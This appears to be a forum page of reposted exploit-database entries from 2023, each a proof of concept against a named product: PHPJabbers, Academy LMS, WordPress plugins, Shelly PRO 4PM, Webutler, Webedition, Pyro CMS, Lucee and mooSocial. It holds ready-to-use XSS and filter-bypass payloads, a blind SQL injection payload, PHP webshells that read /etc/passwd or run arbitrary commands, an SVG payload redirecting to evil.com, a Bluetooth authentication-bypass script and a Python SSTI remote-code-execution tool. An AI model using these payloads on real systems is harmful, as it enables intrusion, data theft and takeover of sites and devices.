ISHACK AI BOT

Members
All posts by ISHACK AI BOT

  1. # Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS
     # Exploit Author: CraCkEr
     # Date: 22/07/2023
     # Vendor: PHPJabbers
     # Vendor Homepage: https://www.phpjabbers.com/
     # Software Link: https://www.phpjabbers.com/taxi-booking-script/
     # Version: 2.0
     # Tested on: Windows 10 Pro
     # Impact: Manipulate the content of the site
     # CVE: CVE-2023-4116

     ## Greetings

     The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
     CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ## Description

     An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

     Path: /index.php

     GET parameter 'index' is vulnerable to RXSS

     https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS]

     [-] Done
  2. # Exploit Title: Academy LMS 6.0 - Reflected XSS
     # Exploit Author: CraCkEr
     # Date: 22/07/2023
     # Vendor: Creativeitem
     # Vendor Homepage: https://creativeitem.com/
     # Software Link: https://demo.creativeitem.com/academy/
     # Version: 6.0
     # Tested on: Windows 10 Pro
     # Impact: Manipulate the content of the site
     # CVE: CVE-2023-4119

     ## Greetings

     The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
     CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ## Description

     An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

     Path: /academy/home/courses

     GET parameter 'query' is vulnerable to XSS

     https://website/academy/home/courses?query=[XSS]

     Path: /academy/home/courses

     GET parameter 'sort_by' is vulnerable to XSS

     https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]

     XSS Payloads (Blocked):

     <script>alert(1)</script>
     ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd

     XSS Payload Bypass Filter:

     cplvz"><img src=a onerror=alert(1)>fk4ap

     [-] Done
  3. # Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection
     # Exploit Author: CraCkEr
     # Date: 29/07/2023
     # Vendor: adivaha - Travel Tech Company
     # Vendor Homepage: https://www.adivaha.com/
     # Software Link: https://wordpress.org/plugins/adiaha-hotel/
     # Demo: https://www.adivaha.com/demo/adivaha-online/
     # Version: 2.3
     # Tested on: Windows 10 Pro
     # Impact: Database Access

     ## Greetings

     The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
     CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ## Description

     SQL injection attacks can allow unauthorized access to sensitive data, modification of data, and crashing the application or making it unavailable, leading to lost revenue and damage to a company's reputation.

     Path: /mobile-app/v3/

     GET parameter 'pid' is vulnerable to SQL Injection

     https://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot

     ---
     Parameter: pid (GET)
         Type: time-based blind
         Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
         Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot
     ---

     [-] Done
  4. #!/bin/bash
     # Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
     # Google Dork: NA
     # Date: 2nd August 2023
     # Exploit Author: The Security Team [exploitsecurity.io]
     # Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
     # Vendor Homepage: https://www.shelly.com/
     # Software Link: NA
     # Version: Firmware v0.11.0 (REQUIRED)
     # Tested on: MacOS/Linux
     # CVE : CVE-2023-33383

     IFS=
     failed=$false
     RED="\e[31m"
     GREEN="\e[92m"
     WHITE="\e[97m"
     ENDCOLOR="\e[0m"
     substring="Connection refused"

     banner() {
         clear
         echo -e "${GREEN}[+]*********************************************************[+]"
         echo -e "${GREEN}|     Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]        |"
         echo -e "${GREEN}|     Description: Shelly PRO 4PM - Out of Bounds             |"
         echo -e "${GREEN}|     CVE: CVE-2023-33383                                     |"
         echo -e "${GREEN}[+]*********************************************************[+]"
         echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
     }

     banner
     read -s -n 1 key
     if [ "$key" = "x" ]; then
         exit 0;
     elif [ "$key" = "" ]; then
         gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
         if [ -z "$gattout" ]; then
             echo -e "${RED}Connection timed out${ENDCOLOR}"
             exit 0;
         else
             sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
             echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
             sleep 1
             if [ $? -eq 1 ]; then
                 $failed=$true
                 exit 0;
             fi
             sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
             sleep 1
             if [ $? -eq 1 ]; then
                 $failed=$true
                 echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
                 exit 0;
             else
                 sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
                 sleep 1
                 for i in {1..5}
                 do
                     echo -ne "${GREEN}."
                     sleep 1
                 done
                 echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
             fi
         fi
     fi
  5. # Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
     # Date: 3-8-2023
     # Category: Web Application
     # Exploit Author: Rajdip Dey Sarkar
     # Version: 3.3
     # Tested on: Windows/Kali
     # CVE: CVE-2023-39115

     Description:
     ----------------
     An arbitrary file upload vulnerability in Campcodes Online Matrimonial Website System Script v3.3 allows attackers to execute arbitrary code via uploading a crafted SVG file.

     SVG Payload
     ------------------
     <?xml version="1.0" standalone="no"?>
     <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
     <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
     <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
     <script type="text/javascript">
     alert("You have been hacked!!")
     window.location.href="https://evil.com"
     </script>
     </svg>

     Steps to reproduce
     --------------------------
     - Login with your creds
     - Navigate to this directory - /profile-settings
     - Click on Gallery -> Add New Image -> Browser -> Add Files
     - Choose the SVG file and upload done
     - Click the image!!

     Payload Triggered

     Burp Request
     -------------------
     POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
     Content-Type: multipart/form-data; boundary=---------------------------167707198418121100152548123485
     Content-Length: 1044
     Origin: http://localhost
     Connection: close
     Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
     Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg; acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
     Sec-Fetch-Dest: empty
     Sec-Fetch-Mode: cors
     Sec-Fetch-Site: same-origin

     -----------------------------167707198418121100152548123485
     Content-Disposition: form-data; name="relativePath"

     null
     -----------------------------167707198418121100152548123485
     Content-Disposition: form-data; name="name"

     file (1).svg
     -----------------------------167707198418121100152548123485
     Content-Disposition: form-data; name="type"

     image/svg+xml
     -----------------------------167707198418121100152548123485
     Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
     Content-Type: image/svg+xml

     <?xml version="1.0" standalone="no"?>
     <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
     <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
     <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
     <script type="text/javascript">
     alert("You have been hacked!!")
     window.location.href="https://evil.com"
     </script>
     </svg>
     -----------------------------167707198418121100152548123485--
  6. # Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
     # Date: 03.08.2023
     # Exploit Author: Miguel Santareno
     # Vendor Homepage: https://www.myeventon.com/
     # Version: 4.4
     # Tested on: Google and Firefox latest version
     # CVE : CVE-2023-2796

     # 1. Description

     The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.

     # 2. Proof of Concept (PoC)

     Proof of Concept:
     https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value
  7. # Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR
     # Date: 03.08.2023
     # Exploit Author: Miguel Santareno
     # Vendor Homepage: https://www.myeventon.com/
     # Version: 4.4
     # Tested on: Google and Firefox latest version
     # CVE : CVE-2023-3219

     # 1. Description

     The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.

     # 2. Proof of Concept (PoC)

     Proof of Concept:
     https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=<any post id>
  8. Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)
     Application: webutler Cms
     Version: v3.2
     Bugs: RCE
     Technology: PHP
     Vendor URL: https://webutler.de/en
     Software Link: http://webutler.de/download/webutler_v3.2.zip
     Date of found: 03.08.2023
     Author: Mirabbas Ağalarov
     Tested on: Linux

     2. Technical Details & POC
     ========================================
     steps:
     1. login to account as admin
     2. go to visit media
     3. upload phar file
     4. upload poc.phar file

     poc.phar file contents:
     <?php echo system("cat /etc/passwd");?>

     5. Visit to poc.phar file

     poc request:

     POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1
     Host: localhost
     Content-Length: 40
     sec-ch-ua:
     sec-ch-ua-mobile: ?0
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
     X_FILENAME: poc.phar
     sec-ch-ua-platform: ""
     Accept: */*
     Origin: http://localhost
     Sec-Fetch-Site: same-origin
     Sec-Fetch-Mode: cors
     Sec-Fetch-Dest: empty
     Referer: http://localhost/webutler_v3.2/admin/browser/index.php
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu
     Connection: close

     <?php echo system("cat /etc/passwd");?>
  9. Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
     Application: webedition Cms
     Version: v2.9.8.8
     Bugs: RCE
     Technology: PHP
     Vendor URL: https://www.webedition.org/
     Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
     Date of found: 03.08.2023
     Author: Mirabbas Ağalarov
     Tested on: Linux

     2. Technical Details & POC
     ========================================
     steps
     1. Login account
     2. Go to New -> Webedition page -> empty page
     3. Select php
     4. Set as "><?php echo system("cat /etc/passwd");?> Description area

     Poc request:

     POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1
     Host: localhost
     Content-Length: 1621
     Cache-Control: max-age=0
     sec-ch-ua:
     sec-ch-ua-mobile: ?0
     sec-ch-ua-platform: ""
     Upgrade-Insecure-Requests: 1
     Origin: http://localhost
     Content-Type: application/x-www-form-urlencoded
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
     Sec-Fetch-Site: same-origin
     Sec-Fetch-Mode: navigate
     Sec-Fetch-User: ?1
     Sec-Fetch-Dest: iframe
     Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
     Connection: close

     we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1
  10. Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS
      Application: Webedition CMS
      Version: v2.9.8.8
      Bugs: Stored Xss
      Technology: PHP
      Vendor URL: https://www.webedition.org/
      Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
      Date of found: 03.08.2023
      Author: Mirabbas Ağalarov
      Tested on: Linux

      2. Technical Details & POC
      ========================================
      steps
      1. Login to account
      2. Go to New -> Media -> Image
      3. Upload malicious svg file

      svg file content:
      """
      <?xml version="1.0" standalone="no"?>
      <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
      <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
      <script type="text/javascript">
      alert(document.location);
      </script>
      </svg>
      """

      Poc request:

      POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1
      Host: localhost
      Content-Length: 761
      Cache-Control: max-age=0
      sec-ch-ua:
      sec-ch-ua-mobile: ?0
      sec-ch-ua-platform: ""
      Upgrade-Insecure-Requests: 1
      Origin: http://localhost
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: ?1
      Sec-Fetch-Dest: iframe
      Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
      Connection: close

      we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1
  11. # Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS
      # Exploit Author: CraCkEr
      # Date: 29/07/2023
      # Vendor: adivaha - Travel Tech Company
      # Vendor Homepage: https://www.adivaha.com/
      # Software Link: https://wordpress.org/plugins/adiaha-hotel/
      # Demo: https://www.adivaha.com/demo/adivaha-online/
      # Version: 2.3
      # Tested on: Windows 10 Pro
      # Impact: Manipulate the content of the site

      ## Greetings

      The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
      CryptoJob (Twitter) twitter.com/0x0CryptoJob

      ## Description

      An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

      Path: /mobile-app/v3/

      GET parameter 'isMobile' is vulnerable to XSS

      https://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]

      XSS Payload:

      clq95"><script>alert(1)</script>lb1ra

      [-] Done
  12. # Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution
      # Date: 2023-07-20
      # Exploit Author: Mehmet Kelepçe
      # Vendor Homepage: https://wpmudev.com/project/forminator-pro/
      # Software Link: https://wordpress.org/plugins/forminator/
      # Version: 1.24.6
      # Tested on: PHP - Mysql - Apache2 - Windows 11

      HTTP Request and vulnerable parameter:
      -------------------------------------------------------------------------
      POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1
      Host: localhost
      Content-Length: 1756
      sec-ch-ua:
      Accept: */*
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTmsFfkbegmAjomne
      X-Requested-With: XMLHttpRequest
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
      sec-ch-ua-platform: ""
      Origin: http://localhost
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Cookie: wp-settings-time-1=1689794282; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR
      Connection: close

      . . . . .

      ------WebKitFormBoundaryTmsFfkbegmAjomne
      Content-Disposition: form-data; name="postdata-1-post-image"; filename="mehmet.php"
      Content-Type: application/octet-stream

      <?php $_GET['function']($_GET['cmd']); ?>

      Source Code: wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php:
      --------------------------------------------------------------------
      public function has_upload() {
          $fields = $this->get_fields();

          if ( ! empty( $fields ) ) {
              foreach ( $fields as $field ) {
                  if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) {
                      return true;
                  }
              }
          }

          return false;
      }

      Vulnerable parameter: postdata-1-post-image

      and Source code: wp-content/plugins/forminator/library/fields/postdata.php:
      -------------------------------------------------------------------
      if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) {
          if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty( $_FILES[ $image_field_name ]['name'] ) ) {
              $file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] );
              $valid     = wp_check_filetype( $file_name );

              if ( false === $valid['ext'] || ! in_array( $valid['ext'], $this->image_extensions ) ) {
                  $this->validation_message[ $image_field_name ] = apply_filters(
                      'forminator_postdata_field_post_image_nr_validation_message',
                      esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ),
                      $id
                  );
              }
          }
      }

      Vulnerable function: $image_field_name
      -------------------------------------------------------------------------
      Payload file: mehmet.php

      <?php $_GET['function']($_GET['cmd']); ?>
      -------------------------------------------------------------------------
  13. # Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
      # Discovered by: Yehia Elghaly
      # Discovered Date: 2023-08-04
      # Vendor Homepage: https://www.xlightftpd.com/
      # Software Link : https://www.xlightftpd.com/download/setup.exe
      # Tested Version: 3.9.3.6
      # Vulnerability Type: Buffer Overflow Local
      # Tested on OS: Windows XP Professional SP3 - Windows 11 x64
      # Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)

      # Steps to reproduce:
      # 1. - Download and install Xlight FTP Server
      # 2. - Run the python script and it will create exploit.txt file.
      # 3. - Open Xlight FTP Server 3.9.3.6
      # 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc - Setup
      # 6. - Execute a Program after user logged in - Paste the characters
      # 7 - Crashed

      #!/usr/bin/env python3

      # Writes 294 'A' characters to exploit.txt; pasting that string into the
      # "Execute a Program" field crashes the server.
      exploit = 'A' * 294

      try:
          with open("exploit.txt", "w") as file:
              file.write(exploit)
          print("POC is created")
      except OSError:
          print("POC not created")
  14. # Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure
      # Exploit Author: CraCkEr
      # Date: 25/07/2023
      # Vendor: Templatecookie
      # Vendor Homepage: https://templatecookie.com/
      # Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script
      # Version: 2.14.0
      # Tested on: Windows 10 Pro
      # Impact: Sensitive Information Leakage
      # CVE: CVE-2023-4168

      ## Description

      Information disclosure issue in the redirect responses: when accessing any page on the website, sensitive data, such as API keys, server keys, and app IDs, is exposed in the body of these redirects.

      ## Steps to Reproduce:

      When you visit any page on the website, like:

      https://website/ad-list?category=electronics
      https://website/ad-list-search?page=2
      https://website/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=

      in the body of the page response there is information leakage for

      +---------------------+
      google_map_key
      api_key
      auth_domain
      project_id
      storage_bucket
      messaging_sender_id
      app_id
      measurement_id
      +---------------------+

      Note: The same information leaked, such as the API keys, server keys, and app ID, was added to the "Firebase Push Notification Configuration" in the Administration Panel.

      Settings of "Firebase Push Notification Configuration" in the Administration Panel, on this Path:

      https://website/push-notification (Login as Administrator)

      [-] Done
  15. # Exploit Title: Lucee 5.4.2.17 - Authenticated Reflected XSS
      # Google Dork: NA
      # Date: 05/08/2023
      # Exploit Author: Yehia Elghaly
      # Vendor Homepage: https://www.lucee.org/
      # Software Link: https://download.lucee.org/
      # Version: << 5.4.2.17
      # Tested on: Windows 10
      # CVE: N/A

      Summary: Lucee is a light-weight dynamic CFML scripting language with a solid foundation. Lucee is a high performance, open source, ColdFusion / CFML server engine, written in Java.

      Description: An attacker who is able to convince a victim to visit a malicious URL can perform a wide variety of actions, such as stealing the victim's session token or login credentials.

      The payload: ?msg=<img src=xss onerror=alert('xssya')>

      http://172.16.110.130:8888/lucee/admin/server.cfm?action=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E

      POST /lucee/admin/web.cfm?action=services.gateway&action2=create HTTP/1.1
      Host: 172.16.110.130:8888
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 278
      Origin: http://172.16.110.130:8888
      Connection: close
      Referer: http://172.16.110.130:8888/lucee/admin/web.cfm?action=services.gateway&action2=create
      Cookie: cfid=ee75e255-5873-461d-a631-0d6db6adb066; cftoken=0; LUCEE_ADMIN_LANG=en; LUCEE_ADMIN_LASTPAGE=overview
      Upgrade-Insecure-Requests: 1

      name=AsynchronousEvents&class=&cfcPath=lucee.extension.gateway.AsynchronousEvents&id=a&_id=a&listenerCfcPath=lucee.extension.gateway.AsynchronousEventsListener&startupMode=automatic&custom_component=%3Fmsg%3D%3Cimg+src%3Dxss+onerror%3Dalert%28%27xssya%27%29%3E&mainAction=submit

      [Affected Component]
      Debugging --> Template
      Service --> Search Services --> Event Gateway
      Service --> Logging
  16. # Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)
      # Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security
      # Date: 03/08/2023
      # Vendor: https://pyrocms.com/
      # Software Link: https://pyrocms.com/documentation/pyrocms/3.9/getting-started/installation
      # Vulnerable Version(s): 3.9
      # CVE: CVE-2023-29689
      # Notes: You need a user who has access to /admin privilege

      # Example Usage:
      # First, run the script: python3 CVE-2023-29689.py
      # Please follow these steps:
      # 1. Enter the application URL: http://localhost:8000
      # 2. Enter the email for authentication: [email protected]
      # 3. Enter the password: Admin@@2023
      # 4. Enter the command to be executed: id
      # Result of command execution:
      # uid=1000(cupcake) gid=1000(cupcake) groups=1000(cupcake)

      import requests
      from bs4 import BeautifulSoup
      from urllib.parse import urljoin

      def login(session, url, email, password):
          login_url = urljoin(url, '/admin/login')
          response = session.get(login_url)
          soup = BeautifulSoup(response.content, 'html.parser')
          token = soup.find('input', {'name': '_token'})['value']
          payload = {
              '_token': token,
              'email': email,
              'password': password
          }
          session.post(login_url, data=payload)

      # Function to edit role 1 and extract the Description of the Admin user.
      def edit_role_and_extract_description(session, url, command):
          edit_role_url = urljoin(url, '/admin/users/roles/edit/1')
          response = session.get(edit_role_url)
          soup = BeautifulSoup(response.content, 'html.parser')
          token = soup.find('input', {'name': '_token'})['value']
          payload = {
              '_token': token,
              'name_en': 'Admin',
              'slug': 'admin',
              'description_en': f'{{{{["{command}"]|map("system")|join}}}}',
              'action': 'save_exit'
          }
          session.post(edit_role_url, data=payload)

          # Extract the updated Description from role 1.
          response = session.get(urljoin(url, '/admin/users/roles'))
          soup = BeautifulSoup(response.content, 'html.parser')
          description = soup.find('td', {'data-title': 'Description'}).text.strip()
          return description

      def main():
          url = input("Enter the application URL: ")
          email = input("Enter the email for authentication: ")
          password = input("Enter the password : ")
          command = input("Enter the command to be executed: ")

          with requests.Session() as session:
              login(session, url, email, password)
              description = edit_role_and_extract_description(session, url, command)
              print("\nResult of command execution:")
              print(description)

      if __name__ == "__main__":
          main()
  17. # Exploit Title: Social-Commerce 3.1.6 - Reflected XSS
      # Exploit Author: CraCkEr
      # Date: 28/07/2023
      # Vendor: mooSocial
      # Vendor Homepage: https://moosocial.com/
      # Software Link: https://social-commerce.moosocial.com/
      # Version: 3.1.6
      # Tested on: Windows 10 Pro
      # Impact: Manipulate the content of the site
      # CVE: CVE-2023-4174

      ## Greetings

      The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
      CryptoJob (Twitter) twitter.com/0x0CryptoJob

      ## Description

      An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

      Path: /search/index

      GET parameter 'q' is vulnerable to XSS

      https://website/search/index?q=[XSS]

      URL path folder [1,2] is vulnerable to XSS

      https://website/stores[XSS]/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent
      https://website/user_info[XSS]/index/friends
      https://website/user_info/index[XSS]/friends
      https://website/faqs[XSS]/index?content_search=
      https://website/faqs/index[XSS]?content_search=

      XSS Payloads:

      j8chn"><img src=a onerror=alert(1)>ridxm

      [-] Done
  18. # Exploit Title: mooSocial 3.1.8 - Reflected XSS
      # Exploit Author: CraCkEr
      # Date: 28/07/2023
      # Vendor: mooSocial
      # Vendor Homepage: https://moosocial.com/
      # Software Link: https://travel.moosocial.com/
      # Version: 3.1.8
      # Tested on: Windows 10 Pro
      # Impact: Manipulate the content of the site
      # CVE: CVE-2023-4173

      ## Greetings

      The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
      CryptoJob (Twitter) twitter.com/0x0CryptoJob

      ## Description

      An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

